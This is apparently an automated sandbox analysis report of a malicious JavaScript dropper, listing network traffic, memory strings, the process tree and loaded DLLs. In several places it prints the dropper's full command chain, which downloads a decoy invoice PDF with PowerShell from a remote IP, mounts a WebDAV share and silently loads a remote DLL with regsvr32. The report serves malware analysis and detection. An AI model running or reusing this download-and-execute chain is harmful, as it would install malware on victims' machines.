    Source: global trafficTCP traffic: 192.168.2.5:56370 -> 1.1.1.1:53
    Source: Joe Sandbox ViewIP Address: 193.143.1.205 193.143.1.205
    Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 193.143.1.205:80
    Source: global trafficHTTP traffic detected: GET /invoice.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.143.1.205Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.205
    Source: global trafficHTTP traffic detected: GET /invoice.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.143.1.205Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: wscript.exe, 00000000.00000003.2066282974.0000021FBBFFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205/invoice.php
    Source: net.exe, 00000007.00000003.2123672131.000001C0D456A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2124471907.000001C0D458F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/
    Source: net.exe, 00000007.00000002.2124383639.000001C0D4538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/tem
    Source: svchost.exe, 00000009.00000002.3359525408.0000018F90800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
    Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
    Source: svchost.exe, 00000009.00000003.2123576965.0000018F906F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: qmgr.db.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 320, type: MEMORYSTR

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
    Source: 1475127682155276.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winJS@27/55@1/2
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2e55z2ht.acm.ps1Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 1475127682155276.jsVirustotal: Detection: 9%
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1680,i,15353841458623981023,14574021241036116658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1680,i,15353841458623981023,14574021241036116658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
